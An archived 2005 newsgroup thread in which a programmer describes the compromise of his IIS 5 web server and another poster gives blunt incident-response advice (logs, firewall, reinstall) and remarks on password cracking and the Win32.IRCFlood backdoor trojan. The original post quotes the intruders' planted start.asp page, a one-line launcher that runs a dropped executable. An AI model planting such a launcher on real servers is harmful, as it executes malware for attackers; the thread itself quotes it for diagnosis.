|
Home > Archive > IIS Server Security > April 2005 > IIS 5 Compromisation
You are viewing an archived Text-only version of the thread.
To view this thread in it's original format and/or if you want to reply to
this thread please [click here]
| Author |
IIS 5 Compromisation
|
|
| Saturday Night Paulsy 2005-04-06, 7:53 am |
| Hi all,
my company has several servers acting as web servers hosted at an ISP and
one of them was compromised by some warez bunnies.
All the server have the latest patches and anti virus software running, but
no firewall...
Several files appeared in a folder off one of the webs, being
kill.exe
shellconfig.ocx
shellsuccesslog.ocx
win.asp
start.asp
shellhost32.exe
win.asp has a title of "Hacking a pub tut by Skkwiddly. Wa2001", and
start.asp reads as follows
<%
CreateObject("WScript.Shell").Run("shellhost32.exe")
%>
<h1>Yes, you made it!! Good job dude!<\h1>
My question is, has anyone encountered this and how do they get the files
there. Two questions, really.
Any help would be greatly appreciated, as they uploaded a significant amount
of german dvd's and other garbage onto the server at our expense.
Regards,
Paul Korosi
| |
| Jeff Cochran 2005-04-06, 5:57 pm |
| On Wed, 6 Apr 2005 20:45:35 +1000, "Saturday Night Paulsy"
<pkorosi@redpepper.com.au> wrote:
>Hi all,
>
>my company has several servers acting as web servers hosted at an ISP and
>one of them was compromised by some warez bunnies.
>All the server have the latest patches and anti virus software running, but
>no firewall...
>
>Several files appeared in a folder off one of the webs, being
>
>kill.exe
>shellconfig.ocx
>shellsuccesslog.ocx
>win.asp
>start.asp
>shellhost32.exe
>
>
>win.asp has a title of "Hacking a pub tut by Skkwiddly. Wa2001", and
>start.asp reads as follows
>
><%
>CreateObject("WScript.Shell").Run("shellhost32.exe")
>%>
><h1>Yes, you made it!! Good job dude!<\h1>
>
>
>My question is, has anyone encountered this and how do they get the files
>there. Two questions, really.
To find out how they got there, check your audit logs and firewall
logs. Oh yeah, you already figured out that they got there because
you weren't secured and had no firewall. Likely you weren't auditing
either. Possibly hadn't turned off anonymous file upload in FTP.
Possibly your host got hacked. Possibly a SQL attack. Possibly using
"password" as a password wasn't that smart. Too many possiblys for
anyone to tell you for sure.
>Any help would be greatly appreciated, as they uploaded a significant amount
>of german dvd's and other garbage onto the server at our expense.
Bummer. Flatten the box, resinstall from scratch, patch, secure and
get that firewall installed. Live and learn.
Jeff
| |
| Saturday Night Paulsy 2005-04-06, 8:48 pm |
| ha ha - nice one Jeff,
I might be dumb but I aint that stupit. I admit I am no security
specialist - I'm a programmer. I thought someone here
might be able to shed some light, judging by the responses to the questions
in this group, some of which quite frankly
don't even belong in this group.
As for your suggestions, administrator only ftp access, 13 character strong
password - it would even take YOU a
century to work it out. All database submissions/request are filtered
against SQL injection attacks using regex. I simply
can't see any way in via that side.
Anyways - it turns out its the Win32.IRCFlood trojan, and appears to be
fairly new as the only patch available to deal with it
is dated yesterday. And, as my MSCE friend has just told me (after some
research), firewalls won't necessarily stop it from getting on
the box - only stop the gigs of shite from getting put on.
For anyone that might be interested, it was probably downloaded by someone
doing "legit" work on the box by browsing. thats what
the msce told me, anyways - and he's a good deal brighter than your average
minesweeper certified solitaire expert.
Finally, thanks for your help. Next time I reckon I'll just fart 'cause
it'll save all this typing time. I could've been drinking coffee instead.
"Jeff Cochran" <jeff.nospam@zina.com> wrote in message
news:42616af5.1154390806@msnews.microsoft.com...
> On Wed, 6 Apr 2005 20:45:35 +1000, "Saturday Night Paulsy"
> <pkorosi@redpepper.com.au> wrote:
>
but[vbcol=seagreen]
>
> To find out how they got there, check your audit logs and firewall
> logs. Oh yeah, you already figured out that they got there because
> you weren't secured and had no firewall. Likely you weren't auditing
> either. Possibly hadn't turned off anonymous file upload in FTP.
> Possibly your host got hacked. Possibly a SQL attack. Possibly using
> "password" as a password wasn't that smart. Too many possiblys for
> anyone to tell you for sure.
>
amount[vbcol=seagreen]
>
> Bummer. Flatten the box, resinstall from scratch, patch, secure and
> get that firewall installed. Live and learn.
>
> Jeff
| |
| Jeff Cochran 2005-04-08, 5:51 pm |
| On Thu, 7 Apr 2005 11:36:15 +1000, "Saturday Night Paulsy"
<pkorosi@redpepper.com.au> wrote:
>ha ha - nice one Jeff,
>
>I might be dumb but I aint that stupit. I admit I am no security
>specialist - I'm a programmer. I thought someone here
>might be able to shed some light, judging by the responses to the questions
>in this group, some of which quite frankly
>don't even belong in this group.
>
>As for your suggestions, administrator only ftp access, 13 character strong
>password - it would even take YOU a
>century to work it out.
A 13 character string, assuming you didn't use high-ASCII characters
since they're awfully hard to type in a password, is about 22 minutes
to crack. Less if I can use an exploit to get the SAM database on an
unpatched system. Is FTP set to lock out the user after x number of
failed attempts?
>All database submissions/request are filtered
>against SQL injection attacks using regex. I simply
>can't see any way in via that side.
It's the ways you can't see that come back to bite you. Are you using
a standard port for SQL? Is *every* query parameterized ans using
stored procedures?
>Anyways - it turns out its the Win32.IRCFlood trojan, and appears to be
>fairly new as the only patch available to deal with it
>is dated yesterday.
The Win32.IRCFlood!Trojan is several years old, and the major AV
vendors have detected it for quite a while. This may be a newer
variant, but even those should be detected. The older version used
IRC ports for control, which would normally be blocked by a firewall
on a system that didn't have IRC clients/servers running.
The major problem you have now though is that this trojan allows
control of the system through a backdoor it installs. You may have
found and removed the trojan, but do you know what other changes have
been made to the system? Possibly none, but you don't have the
logging in place to do the forensics to be sure.
The advice still stands. Flatten the box and reinstall.
>And, as my MSCE friend has just told me (after some
>research), firewalls won't necessarily stop it from getting on
>the box - only stop the gigs of shite from getting put on.
>
>For anyone that might be interested, it was probably downloaded by someone
>doing "legit" work on the box by browsing. thats what
>the msce told me, anyways - and he's a good deal brighter than your average
>minesweeper certified solitaire expert.
The trojan in question is normally delivered via an executable, which
when run installs the trojan and opens the backdoors. I haven't seen
any newer attack vectors for it, but then I haven't looked either. A
new variant may have a new vector. Or something else you haven't
detected may be on the box as well.
>Finally, thanks for your help. Next time I reckon I'll just fart 'cause
>it'll save all this typing time. I could've been drinking coffee instead.
Next time, go ahead and fart *and* save the typing time. But install
and correctly configure a firewall. Configure auditing. Install and
use the latest version of your AV software. Security isn't a singular
event, it's an ongoing process. Fortunately, you can still drink your
coffee while monitoring it.
Jeff
>"Jeff Cochran" <jeff.nospam@zina.com> wrote in message
>news:42616af5.1154390806@msnews.microsoft.com...
>but
>amount
>
|
|
|
|
|